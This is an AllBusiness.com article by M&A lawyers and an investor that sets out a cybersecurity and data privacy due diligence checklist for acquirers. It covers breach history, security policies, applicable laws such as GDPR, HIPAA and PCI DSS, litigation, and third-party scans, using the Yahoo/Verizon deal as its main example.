By Richard D. Harroch, Jennifer Martin, and Richard V. Smith
Data privacy, cybersecurity, and data breach risks are important due diligence issues in mergers and acquisitions. Post-acquisition discovery of security problems, and even notifiable breaches, is a far too common scenario.
According to one report, more than a third (40%) of acquiring companies engaged in a merger and acquisition proceeding said they discovered a cybersecurity problem during the post-acquisition integration of the acquired company. The most highly publicized example of this was Verizon’s discovery of a prior data breach at Yahoo! after having executed an acquisition agreement to acquire the company.
This post-diligence disclosure almost scuttled the deal, and ultimately resulted in a $350 million reduction in the purchase price paid by Verizon, with Yahoo! required to pay a $35 million penalty to settle securities fraud charges alleged by the U.S. Securities and Exchange Commission (SEC) and an additional $80 million to settle securities lawsuits brought by unhappy shareholders.
This article summarizes the growing potential risks—legal, financial, reputational, and operational—associated with cybersecurity, and also provides practical solutions on how to identify, understand, and mitigate those risks during the M&A due diligence process.
Cybersecurity Risk Landscape
Even for those acquiring companies that intend to scrutinize data security issues as part of the M&A due diligence process, often the lawyers conducting such diligence do not adequately understand the current cybersecurity threat landscape or don’t understand the particular risks associated with the target company. More often than not, the lawyers ask a battery of routine, privacy-related questions of a company even when that company does not collect or handle consumer personal data.
The focus on privacy, and not security more generally, is due in part to a general lack of awareness of broader cybersecurity issues, and a hyperawareness of the risks associated with data breaches. To a large degree, an overemphasis on data breach risks is not surprising since companies must publicly disclose breaches of personal data to consumers, and the media frequently focuses considerable attention on these breaches, especially large-scale ones.
The public is beginning to become more aware, however, of the threat of other types of information compromises, including ransomware attacks (in which data is rendered unusable unless a “ransom” payment is made), phishing emails (fraudulent emails sent to trick recipients into provide passwords or other valuable information), and the theft and selective disclosure of sensitive information for embarrassment and harassment (consider, for example, the Sony and Democratic National Committee hacks, in which sensitive emails were made public).
Other Articles From AllBusiness.com:
- The Complete 35-Step Guide for Entrepreneurs Starting a Business
- 25 Frequently Asked Questions on Starting a Business
- 50 Questions Angel Investors Will Ask Entrepreneurs
- 17 Key Lessons for Entrepreneurs Starting a Business
Moreover, companies have always grappled with the theft of proprietary information and trade secrets. While such thefts do not require notification to consumers, the theft of valuable intellectual property and trade secrets can have a devastating impact on a company, particularly young startup companies developing new technologies. The loss of valuable intellectual property can significantly decrease the value of a target company to prospective buyers. Similarly, the value of a company can be manipulated by trading on stolen inside information.
In short, criminal hackers are resorting to a broader array of techniques to monetize and exploit information, and the methods used to acquire that information are increasingly stealthy and sophisticated, making it difficult to defend against and detect such attacks. For example, through advanced techniques allowing for covert surveillance, attackers can monitor and steal data, often sensitive proprietary information or strategies (business, political, or military) over a long period of time without detection.
But the most serious computer threats do not target information or data at all. The NotPetya malware, a purely destructive attack, destroyed entire networks and systems for some of the largest companies in the world, including Merck, Maersk, and FedEx, and cost companies worldwide an estimated $10 billion in damages.
On a smaller scale, the manipulation of the software used in autonomous vehicle, for example, can result in personal injury or death. Or a single component part in a consumer product can be used to disrupt the availability of a vast swath of the Internet.
Regulators, customers, and investors have been quick to react to these evolving threats. A delay by a company in discovering and reporting a data breach can result in significant public criticism to the company as well as legal exposure, including the risk of substantial fines and potential liabilities due to class action lawsuits and shareholder derivative actions. The FTC and state Attorneys General frequently bring enforcement actions relating to delays in reporting a data breach, including in several high-profile breaches such as Equifax, Uber, and, most recently, Google+. Such scrutiny is also a risk for companies that acquire a breached company.
The SEC is also stepping up enforcement actions against public companies that fail to adequately disclose not only actual security incidents, but risks associated with cybersecurity. Specifically, pursuant to its February 2018 Commission Statement and Guidance on Public Company Cybersecurity Disclosures, additional public statements, and its April 2018 SEC settlement order with Yahoo!, the SEC has outlined its expectations for handling disclosure obligations relating to cybersecurity incidents.
Such obligations include, but are not limited to, having sufficient systems of internal controls and processes to ensure an appropriate level of risk-management oversight of an incident, including satisfying SEC disclosure obligations following discovery of an incident; amending or correcting prior material misstatements regarding cybersecurity in risk factor and MD&A disclosures; and instituting trading blackouts, as appropriate.
In fact, the SEC recently investigated nine companies that were victimized by a common cyber-related fraud scheme, whereby accounting personnel received fake emails purportedly from company executives or vendors to wire large sums of money to the perpetrators. Not only did those nine companies lose over $100 million in aggregate to the fraudsters, the SEC investigated them for potential violations of federal securities laws for failing to have in place a sufficient system of internal financial accounting controls.
Finally, many highly regulated industries are required to comply with specific security standards and controls, and to promptly report incidents. For example, pursuant to the Gramm-Leach-Bliley Act, financial institutions are required to implement information security protections to safeguard financial information and to notify their regulators in the event of unauthorized access to such data. The healthcare industry is subject to similar requirements under the Health Insurance Portability and Accountability Act of 1996 (HIPAA).
In other sectors, more stringent requirements may apply. For example, as of January 1, 2018, companies that contract with the Department of Defense are required to comply with the NIST 800-171 standard and report any incidents that impact systems on which government information is stored or processed. Similarly, energy companies regulated by the Federal Energy Regulatory Commission (FERC) are required to comply with Critical Infrastructure Protection reliability standards; FERC is also currently working on mandatory cybersecurity incident reporting rules.
In addition, vendors, suppliers, and other providers of regulated companies are often contractually required to follow these requirements as well, regardless of their size. Thus, companies targeted for acquisition may also be subject to significant contractual obligations regarding cybersecurity. For example, companies that handle credit card information through an e-commerce platform, mobile application, or as a processing vendor are required by banks and credit card issuers to comply with the PCI DSS cybersecurity standards; a failure to satisfy those obligations can result in significant fines and even contract termination. More and more frequently, contracts are requiring vendors across industry sectors to comply with specific security requirements, and to notify contracting partners in the event of an incident.
Mitigating Risk Through Due Diligence
Against this backdrop, it is imperative that an acquirer considering an acquisition fully investigate and identify the particular cybersecurity and data privacy risks and liabilities posed by the transaction. It is equally important that the selling company anticipate cybersecurity and data privacy issues. Notably, because a selling company may not even be aware of a prior or current compromise that may be pertinent to the deal, it is also incumbent upon the acquirer to consider other means of conducting due diligence in this area.
At a minimum, the acquirer’s due diligence investigation should focus on the following:
- Identifying the particular types of privacy and cybersecurity risks the target company faces given its industry sector, geographic reach, and the nature of the products and/or services that it manufactures, develops, or provides.
- Understanding the network and system architecture and data flows, including the use of cloud providers and third-party applications.
- Understand the extent to which the selling company gathers and uses personal information, especially customer personal information and highly sensitive proprietary information, including information provided by business partners and/or governmental agencies.
- Review commitments and representations made by the selling company to its users and customers in connection with privacy and security issues, including contractual obligations.
- Recognize whether the acquirer will need to obtain any consents to use personal or private information of the selling company post-closing.
- Ask whether the selling company has experienced any prior cybersecurity incidents, including data breaches, and how it has responded to such incidents.
- Determine whether the selling company has a written security program that meets current regulatory and industry standards and best practices, including with respect to organizational (policies), operational (processes), and technical controls.
- Assess the acquirer’s potential liability, compliance posture, and/or notification obligations that might exist after completion of the acquisition.
In the remainder of this article, we outline several types of due diligence inquiries and procedures that an acquirer may wish to undertake in connection with its investigation of data privacy and cybersecurity issues. As with any M&A due diligence review, the nature of the inquiry and the procedures employed should be tailored to the situation. Accordingly, not every item discussed below will be appropriate for every data privacy and cybersecurity due diligence review.
1. Review of Selling Company Policies and Contracts
Initially, an acquirer should request and review copies of various policies, contracts, and other documents of the selling company, including the following:
- Whether and to what extent the selling company has deviated from its privacy policies
- Telemarketing and email marketing policies
- Security policies, including but not limited to the selling company’s Information Security Policy, Acceptable Use Policy, and Data Classification Policy
- Results of security audits and assessments, vulnerability scans, and penetration tests
- Privacy and security program maturity plans
- Privacy impact assessment processes and assessment reports
- Certifications (e.g., ISO 27001/2, PCI DSS, SOC) and audit records
- A list of business-to-business customer contracts, particularly with public companies in the financial, health, energy, telecommunications, and other highly regulated industries
- Contracts with the selling company’s vendors, suppliers, and providers
- Incident response plans and playbooks
- Privacy and information security training materials, and a description of the training program
- Employee background investigation processes and policies, and onboarding processes
- Organization and reporting structure as it relates to the security function, and any information regarding executive management of cybersecurity and privacy risk
- GDPR-related compliance materials, as applicable
- Software development processes and documentation
- Insurance policies protecting the company from cybersecurity or data breach issues (including claims history)
- Whether there are appropriate systems of internal accounting controls to guard against fraudulent requests for money
2. Review of Procedures to Protect the Selling Company’s Data
The acquirer also should review the procedures the selling company has put in place to protect its employee, customer, and business partners’ data and information as well as its networks and systems:
- Does the company have a written cybersecurity program that establishes administrative, operational, and technical controls to mitigate security risks?
- Does the selling company have appropriate policies, including at a minimum an Information Security Policy, an employee-facing Acceptable Use Policy, and a Data Classification and Handling Policy?
- Does the selling company conduct regular risk assessments, and vulnerability and penetration testing of systems?
- Does the selling company have dedicated security personnel?
- Does the selling company perform an annual risk assessment relating to privacy and cybersecurity?
- Does the selling company train its employees on privacy and security best practices?
- Does the selling company have a comprehensive Incident Response Plan and is it tested?
- Does the selling company manage vendor risk?
- Does the selling company have a business continuity and disaster recovery plan, and back-up protocols?
- Does the selling company protect the physical security of its facilities and assets?
- Does the selling company implement “reasonable” technical security controls (or comply with mandatory standards), including, for example, anti-virus software, encryption, access controls, network monitoring, authentication, and asset management?
- Does the selling company have an insider threat program to detect the potential theft of proprietary information or intellectual property?
- Does the selling company require privacy impact assessments when implementing new systems or processes?
3. Review of Past Data Breaches Against the Selling Company
The acquirer should be especially concerned about past data breaches against the selling company or intrusions into its computer network.
- Is the selling company aware of any prior cybersecurity incidents, including but not limited to the compromise of sensitive data? A description or report of all prior known incidents should be requested.
- How were any such incidents discovered or detected?
- Did the selling company conduct an investigation and what was the methodology and scope? Was a third-party forensic consultant engaged to investigate the incident? Any investigative reports relating to cybersecurity incidents should be requested.
- What was the impact of the incident on the selling company’s data or systems? What was the scope of the compromise or data impact?
- Has the selling company experienced any theft or suspected theft of proprietary information or intellectual property? If so, when and what kind of information was stolen? Was the subject of the investigation an insider (employee, contractor, or ex-employee) or a third-party intruder?
- Has the selling company experienced a potential breach of personal data? When? Were notifications made? Why or why not? Did the selling company consult with external counsel on legal obligations?
- Has the selling company been defrauded or extorted as a result of an email compromise?
- What remedial actions or patches were implemented to fix any vulnerabilities or other root causes that resulted in an incident or potential incident?
- How often are networks, systems, applications, and other digital assets scanned for vulnerabilities or subject to penetration testing?
4. Is the Selling Company in Compliance with Applicable Laws and Standards?
There are a variety of laws that set forth security and privacy requirements, including notification obligations, the scope of which depend on the selling company’s industry sector or the service or product it develops, manufactures, or provides. It is critical to understand what laws may apply to the selling company and to inquire whether the selling company is governed by and compliant with particular laws, regulations, and standards. Bear in mind that many of these requirements are all pushed down by contract to subcontractors, vendors, suppliers, and other providers of covered entities, even when such vendors are not directly regulated.
The following is a non-exhaustive list of potentially applicable laws for illustrative purposes (appropriate security or privacy counsel should be consulted in any particular M&A due diligence investigation):
General Consumer Privacy and Data Security Laws
- European Union GPDR Rules – Europe’s framework for data protection laws for companies that may collect or process EU residents’ data; GPDR rules have a global reach as they regulate any international company which collects or processes EU residents’ data.
- The Federal Children’s Online Privacy Protection Act – Prohibits the online collection of information of children under the age of 13 and requires publication of a privacy notice and collection of verifiable parental consent when such information is collected.
- Telephone Consumer Protection Act – Imposes restrictions on telemarketing.
- State Data Breach Notification Laws – All 50 U.S. states require customer notification of security breaches involving personal information; moreover, many states are establishing minimal “reasonable” standards to protect consumer data.
- CAN-SPAM laws:Places restrictions on email marketing.
- Evolving federal and state laws – For example, include the California Consumer Privacy Act of 2018, which imports EU GDPR-style rights for California residents around data ownership, transparency, and control.
Financial Services Industry
- Graham Leach Bliley Act – Imposes privacy and security obligations on insurance companies, banks and other covered financial institutions with respect to customer financial records.
- New York Department of Financial Services Cybersecurity Rules – Imposes specific security requirements, including technical controls, and reporting obligations on licensed entities—the requirements are directed at the security of the systems underlying the financial sector, not simply on data.
- Payment Card Industry Data Security Standard (PCI DSS) – Information security standard that applies to organizations that handle branded credit cards; compliance with PCI DSS is historically a contractual requirement of credit card issuers and acquiring banks, but states are beginning to adopt it as a regulatory requirement.
Health Care Industry
- Health Insurance Portability andAccountability Act (HIPPA) – Provides privacy and security requirements and notification obligations to protect patients’ medical records.
- FDA Pre-Market and Post-Market Cybersecurity Guidance on Connected Medical Devices – Establishes best practices for the development and manufacture of connected medical devices throughout the life of the device.
- DFARS 252.204.7012—Requires defense contractors to comply with NIST 800-171 security standards.
- FERC Critical Infrastructure Protection Reliability Standards—Federal Energy Regulatory Commission standards
5. Review of Litigation and Complaints
The acquirer will want to carefully review any litigation or regulatory inquiries affecting the selling company:
- Has the selling company received any litigation claims concerning its privacy or security practices, including class action or shareholder derivative suits post-breach?
- Has the selling company received any governmental or regulatory notices about its privacy or security practices, including from the FTC or the SEC, state Attorneys General, or particular industry regulators? Is the selling company under a current regulatory (e.g., FTC) consent decree or monitoring order?
- Has the selling company notified governmental or regulatory authorities and/or affected persons of a data breach or other incident, and are mandatory notification requirements triggered?
- Has the selling company received breach of contract claims for failure to comply with contractual requirements, including post-incident?
- Has the selling company received privacy or security complaints from its customers?
- Has the selling company settled any claims or complaints? If so, on what terms?
6. Other Pre-Acquisition Due Diligence
Cybersecurity due diligence also may require the consideration of more “invasive” technical methodologies unfamiliar in the traditional M&A due diligence context. Consideration of the following additional steps are particularly important to consider when the seller or the buyer are in highly regulated and/or critical infrastructure industries, for government contractors, or where post-acquisition notification of prior breaches may be required.
- Require the selling company to engage a third-party security company to run vulnerability scans or penetration tests on critical assets (for example, those that store sensitive data or valuable intellectual property) and applications.
- Engage a third-party security company to scan systems for artifacts of current or past compromises (no one wants to acquire a Russian Advanced Persistent Threat (APT) along with their investment).
If such measures cannot be taken prior to acquisition, an acquirer must consider such assessments prior to integration of networks and systems to ensure that any existing infections, malware, or compromises do not spread to the acquirer’s environment.
Cybersecurity due diligence has become increasingly important for M&A transactions. Savvy acquirers understand the potential for significant liabilities resulting from a selling company’s failure to properly identify and handle prior data breaches or other cybersecurity incidents. Less frequently discussed is how a prior cybersecurity incident may impact the value of a selling company, such as when valuable intellectual property has been stolen or when mandatory disclosure of an incident post-acquisition results in significant reputational damage and lost business.
Similarly, a failure to comply with contractual and regulatory requirements may require a buyer to invest significant resources to bring a selling company into compliance and to mitigate privacy and cybersecurity risks.
A thorough and thoughtful due diligence investigation of the selling company’s cybersecurity and data privacy situation is critical for an acquirer to assess the risks and liabilities it may take on by making an acquisition, and whether such risks are relevant to accurately assessing the value of the target company.
Copyright © by Richard D. Harroch. All Rights Reserved.
A note of thanks to Sam Casciato, an IT and cybersecurity engineer at Talix, Inc., for his helpful feedback on this article.
About the Authors
Richard D. Harroch is a Managing Director and Global Head of M&A at VantagePoint Capital Partners, a large venture capital fund in the San Francisco area. His focus is on Internet, digital media, and software companies, and he was the founder of several Internet companies. His articles have appeared online in Forbes, Fortune, MSN, Yahoo, FoxBusiness, and AllBusiness.com. Richard is the author of several books on startups and entrepreneurship as well as the co-author of Poker for Dummies and a Wall Street Journal-bestselling book on small business. He is the co-author of the recently published 1,500-page book by Bloomberg, Mergers and Acquisitions of Privately Held Companies: Analysis, Forms and Agreements. He was also a corporate and M&A partner at the law firm of Orrick, Herrington & Sutcliffe, with experience in startups, mergers and acquisitions, and venture capital. He has been involved in over 200 M&A transactions and 250 startup financings. He can be reached through LinkedIn.
Jennifer Martin is partner in the Silicon Valley officeof Orrick, Herrington & Sutcliffe LLP, and a member of the firm’s Cyber, Privacy, and Data Innovation practice. She advises clients on best practices for mitigating cybersecurity risks across industries, including counseling on cybersecurity program compliance and resiliency on an industry-by-industry basis; managing significant security incidents and providing cross-disciplinary incident response planning; drafting commercial contract terms and requirements for purchasers and vendors; and conducting cybersecurity due diligence in M&A transactions. She has focused on cybersecurity from the legal, technical, and policy perspectives for nearly 20 years from government, in-house, and private practice and consulting perspectives. Read her full profile on Orrick.com.
Richard V. Smith is a partner in the Silicon Valley and San Francisco offices of Orrick, Herrington & Sutcliffe LLP, and a member of its Global Mergers & Acquisitions and Private Equity Group. He specializes in the areas of mergers and acquisitions, corporate governance, and activist defense. Richard has advised on more than 400 M&A transactions and has represented clients in all aspects of mergers and acquisitions transactions involving public and private companies, corporate governance, and activist defense. He is the co-author of the recently published 1,500-page book by Bloomberg, Mergers and Acquisitions of Privately Held Companies: Analysis, Forms and Agreements. Read his full profile on Orrick.com.
The post Data Privacy and Cybersecurity Issues in Mergers and Acquisitions: A Due Diligence Checklist to Assess Risk appeared first on AllBusiness.com. Click for more information about Richard Harroch.